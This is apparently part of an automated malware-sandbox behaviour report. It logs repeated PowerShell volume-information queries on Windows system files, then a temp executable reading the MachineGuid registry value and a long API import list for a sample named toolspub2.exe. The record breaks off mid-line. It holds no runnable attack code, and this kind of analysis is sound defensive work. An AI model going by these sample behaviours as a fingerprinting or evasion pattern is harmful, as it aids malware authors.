                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_0040CCA0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_0040CCA0
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00429C40 CharUpperW,CharToOemBuffA,CharToOemBuffA,AddConsoleAliasW,GetAltTabInfoA,DrawCaption,WinHttpGetProxyForUrl,SetThreadContext,GetFileAttributesExA,DragAcceptFiles,CoGetInstanceFromFile,__putw,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,FindNextVolumeMountPointA,GlobalAlloc,GetWindowsDirectoryW,SetThreadIdealProcessor,GetWindowsDirectoryW,SetThreadIdealProcessor,ReadConsoleOutputCharacterW,FatalAppExitW,BuildCommDCBAndTimeoutsA,GetVolumeInformationW,GetConsoleAliasA,SetProcessShutdownParameters,SetConsoleCP,FindAtomW,GetTempPathA,CompareStringA,GetCurrentDirectoryW,lstrlenW,GetLocaleInfoW,GetCommConfig,CancelIo,_hread,CreateHardLinkA,ConvertFiberToThread,DeleteVolumeMountPointA,EnumSystemCodePagesA,GetEnvironmentStringsW,InterlockedIncrement,InterlockedDecrement,GetProcessVersion,SetLocaleInfoA,_hread,_hread,_hread,ReadConsoleInputW,GetPrivateProfileIntW,GetConsoleAliasExesA,OpenJobObjectA,SetTapeParameters,CreateNamedPipeW,BuildCommDCBAndTimeoutsW,VerSetConditionMask,GetCurrencyFormatW,lstrcpyA,ExitProcess,WriteConsoleInputW,GetFileAttributesA,GetStringTypeW,GetPrivateProfileStringA,OpenSemaphoreA,WriteConsoleOutputW,WriteConsoleInputW,AddConsoleAliasW,HeapCreate,DeleteFileA,WriteConsoleInputW,GetFileAttributesA,WaitNamedPipeW,GetCalendarInfoW,CreateDirectoryExW,GetModuleHandleA,SetThreadLocale,_hread,GetCurrentProcess,MoveFileWithProgressA,HeapFree,EnumSystemCodePagesA,FoldStrin